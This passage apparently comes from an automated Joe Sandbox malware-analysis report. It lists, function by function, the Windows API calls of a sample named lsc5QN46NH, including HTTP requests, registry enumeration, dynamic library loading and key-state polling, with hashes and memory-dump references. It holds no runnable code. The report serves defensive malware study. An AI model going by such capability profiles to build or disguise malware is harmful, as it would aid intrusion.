                                                                                                                • Opcode ID: 5c4c7143dc9a88133438cda51e40e828fa8b85dbc8d616648973c96767d68aeb
                                                                                                                • Instruction ID: b138fae7fc0d59a573643f3caeedaab23849002ef1d470e7244df891e87b5e06
                                                                                                                • Opcode Fuzzy Hash: 5c4c7143dc9a88133438cda51e40e828fa8b85dbc8d616648973c96767d68aeb
                                                                                                                • Instruction Fuzzy Hash: D9210471A40108BEDB18ABB0DC45CFFB76BDF45360F10462DF825A72E1DF3918499A20
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0067184C
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00671872
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006718A2
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 006718E9
                                                                                                                  • Part of subcall function 00672483: GetLastError.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 00672498
                                                                                                                  • Part of subcall function 00672483: SetEvent.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 006724AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                • Opcode ID: fea4726c5e7d47060e61f862521ab7d87bd768ec0d35c052e9fbd1029be8e5c0
                                                                                                                • Instruction ID: f2a49d08623970f8542cbdda1cbd9a27b80d3e10e56037118ceb2716738c91fd
                                                                                                                • Opcode Fuzzy Hash: fea4726c5e7d47060e61f862521ab7d87bd768ec0d35c052e9fbd1029be8e5c0
                                                                                                                • Instruction Fuzzy Hash: DD2180B1500208BFEB119F68DC85EBF77EEEB49744F10812BF549AA240EB249E0557A5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                                                                                  • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                                                                                  • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00686461
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00686468
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0068647D
                                                                                                                • DestroyWindow.USER32(?), ref: 00686485
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                • Opcode ID: d83cce101d5cb0fea24c3888f3ec39843cdcf6047dcf3ca81341867893dda806
                                                                                                                • Instruction ID: 39bce257493d812308af34c74a46aab7be9ea7279bd896ef67cae49c7a5bfad0
                                                                                                                • Opcode Fuzzy Hash: d83cce101d5cb0fea24c3888f3ec39843cdcf6047dcf3ca81341867893dda806
                                                                                                                • Instruction Fuzzy Hash: BB215B71250205BBEF106F64DC80EBF77EAEB59368F209729FA10962A0D7719C919760
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00666DBC
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00666DEF
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00666E01
                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00666E3B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: 372a22331112af1c19d50456234ae9903e6e42f61d9cab9cab25b5573d348a09
                                                                                                                • Instruction ID: 776722ce24b962ade4bf50eac87975f1509751c8acc74f6889ab5350e228a6de
                                                                                                                • Opcode Fuzzy Hash: 372a22331112af1c19d50456234ae9903e6e42f61d9cab9cab25b5573d348a09
                                                                                                                • Instruction Fuzzy Hash: D821A17460020AABDB209F69EC05A9A7BFAEF44720F204A29FDA1D73D0DB719951CB54
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00666E89
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00666EBB
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00666ECC
                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00666F06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: a3dc7b148d6f6c18a36ee8bf879a4198e6346d05ed0766e91de0bb1055892470
                                                                                                                • Instruction ID: 0f2a73f762e3ef1b70dfe56b48d61fd3ed57c596082d11dbe8037cb652fcdf5e
                                                                                                                • Opcode Fuzzy Hash: a3dc7b148d6f6c18a36ee8bf879a4198e6346d05ed0766e91de0bb1055892470
                                                                                                                • Instruction Fuzzy Hash: 1B21CF79604305ABDB209F69EC04AAA77AAEF44724F200B19FCA0D33D0DB71A951CB50
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0066AC54
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0066ACA8
                                                                                                                • __swprintf.LIBCMT ref: 0066ACC1
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0068F910), ref: 0066ACFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                • Opcode ID: 23c398eafd31fd06f748d7b67ab030de27bc10c91ef281ca234083114d0451ae
                                                                                                                • Instruction ID: 991ed7ab38a7dced637c528b3e8182270607dc6e18fc0b2eeb744eae224c11f5
                                                                                                                • Opcode Fuzzy Hash: 23c398eafd31fd06f748d7b67ab030de27bc10c91ef281ca234083114d0451ae
                                                                                                                • Instruction Fuzzy Hash: 90217470640109AFCB50DF64C945DEF77BAEF49314B004069F905AB352DB31EA45CB61
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 0066115F
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 00661184
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 0066118E
                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 006611C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                • String ID: @f
                                                                                                                • API String ID: 2875609808-2661609202
                                                                                                                • Opcode ID: 134453a17be100a731394fff14c13a900c9cbdf8f25fcc0f5f06a5f3ce4ca618
                                                                                                                • Instruction ID: 41025284c61ffda594c96dec8742339138cac75dc5dd1bd409916d82d78e510c
                                                                                                                • Opcode Fuzzy Hash: 134453a17be100a731394fff14c13a900c9cbdf8f25fcc0f5f06a5f3ce4ca618
                                                                                                                • Instruction Fuzzy Hash: 72113C71D0052DE7CF009FA5D948AEEFB7AFF0B711F044566EA81BA240CB749590CBA5
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00661B19
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                • API String ID: 3964851224-769500911
                                                                                                                • Opcode ID: 1034d5c04256d4c02a8662d60b8cab6251a18b1fb7604c09da407fa265663d8a
                                                                                                                • Instruction ID: 67d57f06ee04e2eabc52a5cbd3a5cab9c554befa3e12bfa757f3619276e7e264
                                                                                                                • Opcode Fuzzy Hash: 1034d5c04256d4c02a8662d60b8cab6251a18b1fb7604c09da407fa265663d8a
                                                                                                                • Instruction Fuzzy Hash: 391184719002189FCF40EF54D8918FEB7B6FF26304B544469D815AB392EB325D06CF54
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0067EC07
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0067EC37
                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0067ED6A
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0067EDEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2364364464-0
                                                                                                                • Opcode ID: 81ccf6f1c25561570db525ece8a9981ae56409e4af3ddc6a98794e63b550935c
                                                                                                                • Instruction ID: 08bc90cc80f30bfdce8b3fd2d061f3a886872a223b0066a7f499f3c8e1435fd4
                                                                                                                • Opcode Fuzzy Hash: 81ccf6f1c25561570db525ece8a9981ae56409e4af3ddc6a98794e63b550935c
                                                                                                                • Instruction Fuzzy Hash: 0B819FB16407009FD764EF28C846B2BB7E6AF48710F04C91DF9999B3D2D671AC04CB55
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 00680E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006800FD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0068013C
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00680183
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 006801AF
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 006801BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3440857362-0
                                                                                                                • Opcode ID: 2d24d6795bfc95aa7c972685de5918d1769757896ad8a88fb429a1db99be1b92
                                                                                                                • Instruction ID: bcefeeb6a1de2d28080c6fe6a069bb5843f2f82c8803d84e5cdec488fa6a8321
                                                                                                                • Opcode Fuzzy Hash: 2d24d6795bfc95aa7c972685de5918d1769757896ad8a88fb429a1db99be1b92
                                                                                                                • Instruction Fuzzy Hash: FC517E71208204AFD744EF64CC95E6BB7EAFF84314F404A2DF596872A2DB31E909CB56
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0067D927
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0067D9AA
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0067D9C6
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0067DA07
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0067DA21
                                                                                                                  • Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667896,?,?,00000000), ref: 00605A2C
                                                                                                                  • Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667896,?,?,00000000,?,?), ref: 00605A50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327935632-0
                                                                                                                • Opcode ID: 1930bca97aca5c2aa24a66bc6e5a9f880b1695f21890189b63fb79656ffa34b6
                                                                                                                • Instruction ID: f1f3c77d68feb37e9ebcaf71afaa037f4526ac6cafa007c195d80df79beffb5c
                                                                                                                • Opcode Fuzzy Hash: 1930bca97aca5c2aa24a66bc6e5a9f880b1695f21890189b63fb79656ffa34b6
                                                                                                                • Instruction Fuzzy Hash: 2C512735A00209DFCB44EFA8C4849AEB7F6FF09320B14C569E95AAB352D731AD45CF94
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0066E61F
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0066E648
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0066E687
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0066E6AC
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0066E6B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1389676194-0
                                                                                                                • Opcode ID: 568d90455719661ddff0c134f840f2eebbf6f88b32477ef7f4395af04e8282c6
                                                                                                                • Instruction ID: 269fa227eef96dc026c997838e71f33864e39c0c4f8c7d115811b0d24766d843
                                                                                                                • Opcode Fuzzy Hash: 568d90455719661ddff0c134f840f2eebbf6f88b32477ef7f4395af04e8282c6
                                                                                                                • Instruction Fuzzy Hash: 4B511E75A00105EFCB45EF64C9819AEBBF6EF09314F148499E849AB3A2CB31ED11DF64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d90a5faea9f1aa6baac778202adc1d51f05e1037a905cb9f1e46a599700c7063
                                                                                                                • Instruction ID: 224b3878db9c911852fd804657f42059ff108e713b039210a27ef74a4b29a63c
                                                                                                                • Opcode Fuzzy Hash: d90a5faea9f1aa6baac778202adc1d51f05e1037a905cb9f1e46a599700c7063
                                                                                                                • Instruction Fuzzy Hash: 81419235904114ABE710EFA8CC4CFE9BBA6EB09310F140366EC56A73E1C770AD51DB51
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00602357
                                                                                                                • ScreenToClient.USER32(006C57B0,?), ref: 00602374
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: cd7e7be9f38eb1e2c0e89f1b893f294313b4b369e4f5ddbf5af9a1a367f2cd40
                                                                                                                • Instruction ID: 4656414e8b8fe6d51398834cd93f81846d31ea848fab6a7f094c4848e921998e
                                                                                                                • Opcode Fuzzy Hash: cd7e7be9f38eb1e2c0e89f1b893f294313b4b369e4f5ddbf5af9a1a367f2cd40
                                                                                                                • Instruction Fuzzy Hash: 85416F3560411AFBCF1D9F68C848AEABB76FF05364F204319F929A22D0CB359990DF91
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006563E7
                                                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00656433
                                                                                                                • TranslateMessage.USER32(?), ref: 0065645C
                                                                                                                • DispatchMessageW.USER32(?), ref: 00656466
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00656475
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                • String ID:
                                                                                                                • API String ID: 2108273632-0
                                                                                                                • Opcode ID: 224e1a5c182e3f2a97c4d746c7d3f6d53e46d62a7ae2fdd9e2523db9cea35f58
                                                                                                                • Instruction ID: 2da80661ea61ba2a1429af2fd678ae1f7f1d97acfcd103add29af75fafb3a730
                                                                                                                • Opcode Fuzzy Hash: 224e1a5c182e3f2a97c4d746c7d3f6d53e46d62a7ae2fdd9e2523db9cea35f58
                                                                                                                • Instruction Fuzzy Hash: 8231A431900656AFDB648F70DC44FF67BEBAB01302F949269F822C32A1E765A4CDD761
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00658A30
                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00658ADA
                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00658AE2
                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00658AF0
                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00658AF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
